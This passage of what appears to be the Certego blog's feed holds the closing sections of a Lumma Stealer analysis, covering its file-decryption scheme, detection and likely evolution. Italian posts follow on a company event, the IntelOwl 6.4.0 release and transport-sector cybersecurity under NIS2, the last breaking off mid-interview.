&lt;h2&gt;&lt;a id=&quot;dropped-file-decryption-1&quot;&gt;&lt;/a&gt;Dropped file decryption&lt;/h2&gt;
&lt;p&gt;As discussed in the namesake section from version 4, the previous method consisted of Base64 decoding followed by an XOR operation using a 32-byte key prepended to the ciphertext. This approach was also used to decrypt network communications in Lumma Stealer v4.&lt;/p&gt;
&lt;p&gt;Following the update to the encrypted strings in the configuration file retrieved via the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; command, the same encryption method has now been also applied to the dropped files received through the &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; command. Notably, the key has been reduced to just 8 bytes.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;lumma-stealer-seen-from-the-certego-perspective&quot;&gt;&lt;/a&gt;Lumma Stealer seen from the Certego perspective&lt;/h1&gt;
&lt;p&gt;Certego detects Lumma Stealer through a combination of signature-based detection via IDS, behavioral monitoring of endpoints via EDR, and threat intelligence correlation based on known indicators and campaign characteristics. Despite its widespread distribution, Lumma poses limited risk to enterprise companies that are properly protected by a proactive, first-class MDR system.&lt;/p&gt;
&lt;p&gt;Lumma Stealer has shown minimal impact on our Customers using PanOptikon® platform. To date, we have only seen 17 cases involving this malware specifically. Its limited presence is consistent with its low effectiveness in enterprise environments, where enterprise-level endpoint protection, EDR, and network-level defenses - together with Certego services - significantly reduce its success rate.&lt;/p&gt;
&lt;p&gt;What we observed is that when corporate credentials compromised by Lumma do surface, they typically originate from personal devices. In several cases, employees had saved work credentials in browser password managers on their home computers, which were subsequently infected by Lumma or similar stealers such as RedLine, leading to enterprise credential compromise, along with personal ones.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;a-personal-consideration&quot;&gt;&lt;/a&gt;A personal consideration&lt;/h1&gt;
&lt;p&gt;It is worth noting that in the transition from version 4 to version 6.3, the threat actor first modified the decryption method used for hardcoded C2 domains and later applied the same method to the communication protocol. In a similar way, the decryption routine from version 4, which was based on Base64 decoding followed by an XOR operation, was reused to encrypt the strings contained in the JSON structures of the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; commands, although with a reduced key length.&lt;/p&gt;
&lt;p&gt;From a defensive perspective, this reuse and redistribution of known logic greatly simplifies the analysis process and makes the malware&apos;s future behavior more predictable. &lt;em&gt;If a future update is released&lt;/em&gt;, it is reasonable to expect that the decryption method for hardcoded C2 domains will be changed first. Then, after approximately two to three months, the same technique will likely be applied to the communication logic, with some structural adjustments. The previously used method may still be employed in secondary or less critical components as string encryption.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;#final-remarks&quot;&gt;&lt;/a&gt;Final Remarks&lt;/h1&gt;
&lt;p&gt;This analysis was conducted between October 2024 and April 2025. During this period, we chose not to publish any preliminary blog posts, as revealing technical details about Lumma Stealer could have prompted its administrators to release an updated version. Such a change would have significantly hindered the progress of the thesis work. The full thesis, which documents the analysis and the development of the associated framework, will be published shortly and linked at the top of this blog post.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Oltre la tempesta | Alleanze e tecnologie per la difesa digitale]]></title><link>https://www.certego.net/blog/certego-oltre-la-tempesta-coming-soon/</link><guid isPermaLink="false">certego-oltre-la-tempesta-coming-soon</guid><category><![CDATA[Event]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi]]></dc:creator><pubDate>Tue, 17 Jun 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Quest’anno il Cybersecurity Event di Certego, ci porterà nella suggestiva Darsena del Sale di Cervia&lt;/strong&gt;, un luogo sospeso tra storia e innovazione.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Mercoledì 18 giugno&lt;/strong&gt; esploreremo il valore delle alleanze e delle tecnologie evolute in un contesto digitale sempre più instabile e imprevedibile. Un invito a riflettere su come affrontare la complessità e l’imprevedibilità del mondo digitale attraverso la collaborazione, l’innovazione tecnologica e una maggiore consapevolezza.&lt;/p&gt;
&lt;p&gt;Scopri i dettagli dell&apos;evento.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[IntelOwl 6.4.0]]></title><description><![CDATA[Nuova release della piattaforma di Threat Intelligence Investigation]]></description><link>https://www.certego.net/blog/intelowl-threat-intelligence-investigation-platform-nuova-release-2025/</link><guid isPermaLink="false">intelowl-threat-intelligence-investigation-platform-nuova-release-2025</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 21 May 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/intelowlproject/IntelOwl/releases/tag/v6.4.0&quot;&gt;È disponibile la nuova release 6.4.0 di IntelOwl&lt;/a&gt;, frutto di un percorso di evoluzione continua volto a rendere sempre più efficaci, strutturate e integrate le attività di Threat Intelligence e le operazioni del Security Operation Team di Certego.&lt;/p&gt;
&lt;p&gt;Questa versione introduce nuove funzionalità chiave che rappresentano un importante passo avanti nella capacità della piattaforma di supportare gli analisti nella valutazione, correlazione e gestione degli indicatori di compromissione.&lt;/p&gt;
&lt;h2&gt;1. Analyzable: riferimento unico per ogni oggetto analizzato&lt;/h2&gt;
&lt;p&gt;Con la versione 6.4.0, la funzionalità Analyzable introduce una rappresentazione unificata dell’oggetto analizzato — che si tratti di un osservabile (come un IP, dominio, hash) o di un campione (sample).
Ora, ogni job di analisi è direttamente associato al relativo Analyzable, rendendo possibile collegare più report di analisi a un unico oggetto.
Questo approccio &lt;strong&gt;consente una visione più completa e strutturata della cronologia analitica di un osservabile, semplificando la consultazione dei risultati e la loro correlazione nel tempo&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;2. Data Models: standardizzazione avanzata per l’interoperabilità degli output&lt;/h2&gt;
&lt;p&gt;Ogni analyzer in IntelOwl produce risultati strutturalmente diversi, riflettendo le specificità degli strumenti e delle tecniche utilizzate. Sebbene questa flessibilità sia necessaria, confrontare in modo sistematico un’informazione ricorrente tra più analyzer poteva richiedere un’analisi manuale e frammentata da parte dell’utente.
La versione 6.4.0 introduce il nuovo sistema dei Data Models, che consente di mappare i dati rilevanti generati dagli analyzer all’interno di uno schema strutturato e condiviso.
Questo approccio &lt;strong&gt;riduce la necessità di interpretazioni manuali e favorisce una lettura più rapida, omogenea e comparabile delle informazioni critiche&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/threat-research-la-chiave-per-un-servizio-mdr-proattivo/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACjUlEQVR42lVSWWsTYRTNPxD8Df6E/gHfxOXBl+LyJIggIrhRF3wp1kKlVGgrxGoLljZiY2rbtGMTJ5M2i03SNMlkmWQmsyWzZenXgij4NMdvUkF8ONyZw3cP595zfZKi48t2DNxOEuEtBoVSGYbVgdYyobet/9A2TFi2g06nh5Zh0zceZ2G/IrnhrIxKQ3F8TSrI7aZQrgqIfONQrtUHgjoV1P4KebXlfRttRHIpBCIcGrJOBW04toW5aMW9NJMFk2k4Pq9BNXv0sQO704dGq6SZUPR/Dj23SssBL4oY8fvxYOYNwimO9rSoYAf5quqG9prg6zJ1SBsD+xqWKT4OKl1BqY3ZtDr4X9hTEMyrWCm0EN4rILafRKevoqrwWNgMYXRuHnm+4v7++YtO5pw4rDVklIQmMsUacryAfLGKLF9HqaFCbFPH3mhdghCbxNhSEIlqGZFiEQtMELde3MeVe1fdSf8EyoLo+FTdQJSNg+V2EYnScOIJfF5dBxuLYzeRRozbGXCFAo+CIGIlmQCT+47VRByPJh7j4s1zODs85J46cxrjU1OOz9uP2NQo1AFktQVFa0OSKScpaFB4vERDMEwbqSqP0aVPeD6/iKfTr3Bn9C6uPbztnr8xjPeB+ZORe/0j9A6P0CfHg2C8kzBNB6ZFQZfupU73gzblJFXGYmQTs+sbWIkzmPgwg7G51+6T6XGssV8dn2F1EeVS2GYT2GBY5A7KcPrHEI0eZKtHT8aGSoPzYNo9ii7ygoCtgwME0ym8XF7C9Wcj7tDlC3gXWHZ8dESyFo6QMMOS0BpDdhIZopsdUmoapCwbRBBlUqtLA9CbJbphE+qeCE2NpHmBZCm/mcocTvrf/tiOxYU/SgyY8bbGk9YAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Certego MDR Threat Research&quot; title=&quot;&quot; src=&quot;/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/71c1d/Certego-MDR-Threat-Research.png&quot; srcset=&quot;/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/804b2/Certego-MDR-Threat-Research.png 384w,
/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/e5715/Certego-MDR-Threat-Research.png 768w,
/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/71c1d/Certego-MDR-Threat-Research.png 1536w,
/website/static/5624fe807c6c96b83ba7b4a7ab36f55a/a878e/Certego-MDR-Threat-Research.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;3. User Events: valutazioni personalizzate a supporto dell’analisi&lt;/h2&gt;
&lt;p&gt;La versione 6.4.0 introduce un aggiornamento che consente agli utenti di associare manualmente valutazioni e osservazioni personalizzate a un analyzable, tramite gli User Events.
Questa funzionalità permette, ad esempio, di registrare che un dominio analizzato (es. google.com) è ritenuto lecito con un elevato livello di confidenza. Le annotazioni vengono così strutturate in modo coerente all’interno della piattaforma, arricchendo il contesto analitico con informazioni qualitative generate dagli analisti stessi. In questo modo, IntelOwl &lt;strong&gt;integra la conoscenza umana con i dati tecnici, favorendo una gestione collaborativa e condivisa degli osservabili&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;4. Engine: sintesi automatica tra dati tecnici e input umani&lt;/h2&gt;
&lt;p&gt;L’Engine aggiornato ha il compito di combinare in modo intelligente i dati provenienti dagli analyzer con i contributi degli analisti (tramite User Events), fornendo una valutazione aggregata per ogni job. Il risultato è un’&lt;strong&gt;indicazione più completa, utile per indirizzare rapidamente l’attenzione sugli elementi più rilevanti&lt;/strong&gt;.&lt;/p&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;p&gt;IntelOwl è integrata nativamente con la piattaforma di Unified Security Operations PanOptikon, costituendo uno strumento fondamentale per gli analisti di Certego.
Grazie a questa integrazione, gli analisti possono contare su un sistema di Threat Intelligence ad alta precisione e affidabilità, che consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;monitorare e validare in tempo reale gli indicatori di compromissione (IOC);&lt;/li&gt;
&lt;li&gt;svolgere analisi approfondite su domini, file, IP, hash e altri osservabili;&lt;/li&gt;
&lt;li&gt;correlare evidenze tecniche e conoscenze umane in un unico flusso operativo integrato.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;IntelOwl 6.4.0 potenzia ulteriormente la capacità di Certego di rispondere con tempestività e precisione agli attacchi informatici, rafforzando il presidio continuo contro le minacce avanzate.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/cybersecurity-nei-trasporti-una-sfida-che-corre-veloce/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAC4jAAAuIwF4pT92AAACPElEQVR42j2RW2sTURSFp6+CoK/+ABFRqQaUliapVtFUmlZj0KbEiBIptIjUZ30Vii/6IhGNGhorEYJJ01wMaWpzay6TSSaXSdKZyZw5Z5K5JPYveKLi4WPDhrPW3qxNHHCCP7qT2E0FtsLFclWUZB4gXpS6GICQJOcq9SxV+zU8BLDHC1AQpf8QLA9+pjLNBpNM7ODa78sQShKScOUEqKnDj4HIMZP1hesTVg60IXbE/BNzQCqwcryBUh0500Z7TZBuilEakAcQAKQqA08oTly8QuiMp5ec2EhRB4qiYSNsgcXIW+Df5zhPnv+Le5/3lboVFgoAqurAE4wS4/qxS1eJ8wbi3NSM8+l2MiNrQ4j6BJ6eYUSyA3MMiNdAsiFmW5DmUA/12C5UteGGP0ycMhwd1x/XTY2dnDhy4szZSdP6+utGsz0SVyo0TdfJEkWVKRGIAOCF8VZ/Autp+4Xcg0e3zLZ5q33WPHdjYvrmotVh1M+8eesm8I9SuUpStXK1TlbqVLVRLNPVGiOIo1Rw5vi9evnEbpt3Prz92Lm0uvpsee355dk7nk3/aHJf1vrKQFYGUl/BLRiB8GEw2FrRDn2B7cnrc9PzFptzxXJ/xW5fNl1b+Or1ETi3yI/dUCThD0bT2SJAco1DDR612W6rw2PwLfG13332GE1my6JDb3bcXbinu2Bwub8QXFcMRRPhWPL7VmwvnReQTHOwziGmwzNtrtliWV4EUFLUYYmiA6GY91vQu+l3fdjIF8jfTFGuaiqaebIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Cybersecurity trasporti&quot; title=&quot;&quot; src=&quot;/website/static/a44c618ab11d2eeda59dade21bf13d1b/71c1d/Cybersecurity%20trasporti.png&quot; srcset=&quot;/website/static/a44c618ab11d2eeda59dade21bf13d1b/804b2/Cybersecurity%20trasporti.png 384w,
/website/static/a44c618ab11d2eeda59dade21bf13d1b/e5715/Cybersecurity%20trasporti.png 768w,
/website/static/a44c618ab11d2eeda59dade21bf13d1b/71c1d/Cybersecurity%20trasporti.png 1536w,
/website/static/a44c618ab11d2eeda59dade21bf13d1b/a878e/Cybersecurity%20trasporti.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Cybersecurity nei trasporti]]></title><description><![CDATA[Una sfida che corre veloce]]></description><link>https://www.certego.net/blog/cybersecurity-nei-trasporti-una-sfida-che-corre-veloce/</link><guid isPermaLink="false">cybersecurity-nei-trasporti-una-sfida-che-corre-veloce</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Wed, 14 May 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Sommario&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1&quot;&gt;Cybersecurity nei trasporti: tra minacce emergenti, obblighi normativi e la risposta operativa - A cura di Certego&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#risk&quot;&gt;Quando il rischio diventa realtà: gli impatti concreti di un incidente informatico&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#nis2-1&quot;&gt;NIS2: un nuovo standard europeo per la resilienza digitale&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#nis2-2&quot;&gt;NIS2: criticità applicative per le aziende&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#mdr&quot;&gt;Il valore di un servizio MDR per la compliance e la risposta agli incidenti&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2&quot;&gt;Trasporti sotto attacco: la cybersicurezza al centro della trasformazione digitale - Intervista a Renato Imbruglia, Segretario Generale di Conftrasporto&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3&quot;&gt;Navigare nella cybersicurezza: l’impegno di Assarmatori per una transizione digitale sicura - Intervista a Mattia Canevari, Responsabile Transizione Energetica e Regolazione Marittima di Assarmatori&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Nel mondo dei trasporti, la sicurezza informatica è diventata una priorità strategica, così come sta accadendo in tutti gli altri settori. Crescono le minacce, aumentano gli obblighi normativi e si fanno sempre più complesse le esigenze operative. La Direttiva NIS2 impone nuovi standard, mentre le aziende si trovano a dover rafforzare la propria resilienza informatica.&lt;/p&gt;
&lt;p&gt;Affrontare i rischi informatici è oggi una necessità inderogabile anche per il settore dei trasporti. In questo speciale del nostro blog approfondiamo il tema con il prezioso contributo di Mattia Canevari, Responsabile Transizione Energetica e Regolazione Marittima di Assarmatori, e Renato Imbruglia, Segretario Generale di Conftrasporto. Attraverso le loro analisi, approfondiamo i principali rischi e le risposte concrete che operatori e istituzioni stanno mettendo in campo.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;1&quot;&gt;&lt;/a&gt; 1. Cybersecurity nei trasporti: tra minacce emergenti, obblighi normativi e la risposta operativa - A cura di Certego&lt;/h2&gt;
&lt;p&gt;Il settore dei trasporti è sempre più nel mirino delle minacce informatiche. Secondo il report &lt;strong&gt;&quot;ENISA Threat Landscape 2024&quot;&lt;/strong&gt;, gli attacchi informatici contro questo comparto in Europa hanno registrato un incremento dell’+11% rispetto al 2023. Un dato che riflette una tendenza preoccupante, dovuta alla crescente digitalizzazione, interconnessione e automazione delle infrastrutture critiche.
Una lettura più dettagliata dei dati ENISA mostra come gli attacchi si distribuiscano in modo significativo tra i vari comparti:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Aviazione: 28%&lt;/li&gt;
&lt;li&gt;Strade: 24%&lt;/li&gt;
&lt;li&gt;Ferrovie: 21%&lt;/li&gt;
&lt;li&gt;Marittimo: 18%&lt;/li&gt;
&lt;li&gt;Attacchi generalizzati all’intero comparto: 8%&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In particolare, il &lt;strong&gt;settore marittimo&lt;/strong&gt;, con il suo 18%, rappresenta una superficie d’attacco strategica per la logistica globale, con rischi che spaziano dal sabotaggio dei sistemi OT al furto di informazioni riservate sui carichi e le rotte.&lt;/p&gt;
&lt;h3&gt;&lt;a id=&quot;risk&quot;&gt;&lt;/a&gt; Quando il rischio diventa realtà: gli impatti concreti di un incidente informatico&lt;/h3&gt;
&lt;p&gt;Un incidente informatico nel settore dei trasporti può causare gravi conseguenze operative, economiche e reputazionali. Tra gli impatti immediati ci sono il blocco dei sistemi IT, interruzioni nei servizi e perdite finanziarie legate a ripristino, consulenze e possibili riscatti. La fiducia di clienti e partner può diminuire, danneggiando l’immagine pubblica. La compromissione dei dati sensibili espone l’azienda a sanzioni legali. Inoltre, si rischia l’interruzione della supply chain e la perdita di vantaggio competitivo.
Infine, ci sono responsabilità legali e contrattuali che possono trasformare l’incidente in una crisi aziendale a tutto tondo.&lt;/p&gt;
&lt;h3&gt;&lt;a id=&quot;mis2-1&quot;&gt;&lt;/a&gt; NIS2: un nuovo standard europeo per la resilienza digitale&lt;/h3&gt;
&lt;p&gt;L’entrata in vigore della Direttiva NIS2 (Network and Information Security Directive 2) rappresenta un punto di svolta per tutte le organizzazioni “essenziali”, tra cui quelle del settore trasporti. Le aziende sono ora chiamate a rispettare obblighi stringenti, tra cui:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;notifica degli incidenti entro 72 ore;&lt;/li&gt;
&lt;li&gt;adozione di policy strutturate di gestione del rischio cyber;&lt;/li&gt;
&lt;li&gt;formalizzazione di piani di business continuity;&lt;/li&gt;
&lt;li&gt;collaborazione con i CSIRT nazionali per la gestione degli incidenti;&lt;/li&gt;
&lt;li&gt;gestione della sicurezza della supply chain e condivisione delle informazioni sulle vulnerabilità.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;a id=&quot;mis2-2&quot;&gt;&lt;/a&gt; NIS2: criticità applicative per le aziende&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Complessità nel rispettare la tempistica delle 72 ore&lt;/strong&gt;: Molte minacce informatiche sono sofisticate e silenziose, e la loro identificazione richiede tempo e analisi tecniche approfondite. Senza un adeguato supporto nelle fasi di identificazione e risposta, il rischio è di non riuscire a rispettare i tempi previsti dalla normativa, esponendo l&apos;organizzazione a conseguenze legali e reputazionali.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Approccio organizzativo frammentato&lt;/strong&gt;: La gestione della sicurezza non può più essere responsabilità esclusiva del reparto IT. La NIS2 impone un coinvolgimento diffuso e rende necessario un approccio strutturato a livello aziendale, in cui la sicurezza informatica sia riconosciuta come una responsabilità condivisa tra tutte le funzioni. Questo richiede l&apos;implementazione di percorsi di formazione e consapevolezza rivolti a tutto il personale, superando la visione tradizionale che limita la cybersecurity al solo ambito tecnico — un cambiamento che, nella maggior parte delle organizzazioni, è ancora assente o in fase embrionale.
La Direttiva NIS2 segna una trasformazione profonda nella gestione della sicurezza informatica in Europa e, anche per le aziende del settore trasporti, l’adeguamento richiede uno sforzo significativo sia sul piano tecnologico che organizzativo. Solo attraverso un approccio integrato, consapevole e proattivo è possibile rispondere efficacemente alle nuove sfide della resilienza digitale.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;a id=&quot;mdr&quot;&gt;&lt;/a&gt; Il valore di un servizio MDR per la compliance e la risposta agli incidenti&lt;/h3&gt;
&lt;p&gt;In un contesto normativo sempre più articolato, come quello delineato dalla Direttiva NIS2, l’adozione di un servizio Managed Detection &amp;#x26; Response (MDR) rappresenta una leva fondamentale anche per le aziende del settore trasporti, che vogliono garantire una gestione efficace degli incidenti di sicurezza informatica.&lt;/p&gt;
&lt;p&gt;Un servizio MDR consente di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;1.Monitorare 24 ore su 24 l’ambiente infrastrutturale aziendale, identificando in tempo reale comportamenti anomali e minacce emergenti;&lt;/li&gt;
&lt;li&gt;2.Gestire gli incidenti in modo strutturato, con l’apertura automatica di ticket, analisi specialistica degli eventi e attivazione di playbook di risposta coerenti con la gravità dell’attacco;&lt;/li&gt;
&lt;li&gt;3.Supportare le aziende nella conformità normativa, facilitando la compilazione e l’invio della reportistica obbligatoria sul portale ACN, in linea con le tempistiche richieste dalla NIS2 (prima comunicazione entro 24 ore, notifica completa entro 72 ore, follow-up tecnico entro 30 giorni).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Grazie a tecnologie avanzate e a un team specializzato attivo H24, un servizio MDR può fare la differenza non solo nel contenere l’impatto di un incidente, ma anche nel documentarlo correttamente secondo gli standard attesi da ACN, contribuendo in modo determinante alla compliance e alla resilienza organizzativa&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Dal rischio all’opportunità: costruire sicurezza, creare valore&lt;/h3&gt;
&lt;p&gt;La compliance normativa, se ben gestita, può diventare un’occasione per rafforzare il proprio posizionamento competitivo. Per farlo, occorre andare oltre la logica del “firefighting” e adottare una strategia di cybersecurity integrata, condivisa, e realmente sostenibile.
Certego affianca il settore trasporti in questo percorso, offrendo una visione concreta e misurabile della sicurezza informatica; perché &lt;strong&gt;ogni treno, ogni nave, ogni camion oggi è connesso. La vera destinazione è la resilienza&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;2&quot;&gt;&lt;/a&gt; 2. Trasporti sotto attacco: la cybersicurezza al centro della trasformazione digitale - Intervista a Renato Imbruglia, Segretario Generale di Conftrasporto&lt;/h2&gt;
&lt;div align=&quot;left&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/5d6bb26ffa4e286aa3278c6f325d551e/a878e/Renato%20Imbruglia.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAC4jAAAuIwF4pT92AAACKklEQVR42k1Sa0sUYRid31P4UUjoskQKYmrfLLTAoCzQMM1PQlgGBrFFBaHhrq2QlJpaXid13G0v7u6sMzs7t3cuO++8l7lo1G9oSovg8MDzHDgHznkYq+4ubXG76ezn1Q1ekLAXQkRd7P2F77ioDhEiwZ/1f8pjbAdlsnlV1dMcp6ma74cOovCEpoiEpqkJFRYYUnTE3lEk/U+dqSOvYAUFg34zg4xOsxqi1Itw4kNCx5YtcQGIS6a0odR44h8Fhz8gIpEEY7t0UXAnCzBVgski/FBxczrJAwKxj4kfWVlAKLPPuZX4fGJs4E738MiDdCbrH/7ENIic6Y5obvJ6RgRfBXOzAtZ5sC0YCrBV3TRsVBVKM1MTz54M9V5rbb507kzjqdbms4mpF8CwGBdRTdGUmqLIqirVNFmRDgRNli0bGpaDMd4XzffLaUM+eB1/PHy/7+nE6PjDwfaWxrm5WSaKJ8tLubKYFzVOhjkdZRQ3rbgAejbyDsPQqFY/vRrfX3hja3x/3/Xunqs3bvZ2tsX22CUGIq9iUcGiEgzKdlAEeB+QvI5LACt1QglVqtX42OjLRyPcxsd7t7vu3uq+3NbS0HB6OpFgHJds72S2WO7LGlss8kEQEvI77WgiRP3w+/Tbqf6BwZGhgc6O9osXmq60xXq6OmLnm6YTSaYO8drm7jq7t7zKpnOl6EmOez4GIr7lIKmmWnVYqlTnF1dmUzPJZCL5LlUqV34BHzjEa4OxkEQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/5d6bb26ffa4e286aa3278c6f325d551e/71c1d/Renato%20Imbruglia.png&quot; srcset=&quot;/website/static/5d6bb26ffa4e286aa3278c6f325d551e/804b2/Renato%20Imbruglia.png 384w,
/website/static/5d6bb26ffa4e286aa3278c6f325d551e/e5715/Renato%20Imbruglia.png 768w,
/website/static/5d6bb26ffa4e286aa3278c6f325d551e/71c1d/Renato%20Imbruglia.png 1536w,
/website/static/5d6bb26ffa4e286aa3278c6f325d551e/a878e/Renato%20Imbruglia.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;Nel contesto di una trasformazione digitale sempre più rapida, il settore dei trasporti si trova ad affrontare sfide cruciali in materia di sicurezza informatica. Renato Imbruglia, Segretario Generale di Conftrasporto, ci offre una panoramica sulle principali minacce cyber che colpiscono il comparto e sulle difficoltà nell’integrare nuove tecnologie senza esporre le infrastrutture a rischi crescenti.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quali sono le principali minacce informatiche che il settore dei trasporti sta attualmente affrontando?&lt;/strong&gt;
Il settore dei trasporti è attualmente esposto a una serie di minacce informatiche che, se non adeguatamente affrontate, potrebbero mettere a rischio la sicurezza e l&apos;efficienza operativa. Tra le principali minacce troviamo attacchi ransomware, che mirano a cifrare i dati e richiedere un riscatto per il loro rilascio, causando gravi interruzioni nei servizi, e attacchi di tipo DDoS (Distributed Denial of Service), che rappresentano un&apos;altra minaccia significativa, poiché saturano le risorse di rete, rendendo i servizi indisponibili e compromettendo la business continuity. Inoltre, il comparto è esposto, al pari di altri settori, alle tecniche di phishing e social engineering, utilizzate per ingannare gli utenti e ottenere accesso a informazioni sensibili; tali accessi abusivi ai sistemi informatici aziendali costituiscono un ulteriore rischio, ovvero quello che le penetrazioni all’interno dei sistemi abbia la finalità di rubare dati o causare danni all’infrastrutturazione di rete. Last but not least, il malware rappresenta, di fatto, una minaccia costante, con software malevoli che possono compromettere la sicurezza dei sistemi e delle reti aziendali.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quali sono le sfide principali nell’integrare nuove tecnologie digitali nel settore dei trasporti senza compromettere la sicurezza informatica?&lt;/strong&gt;
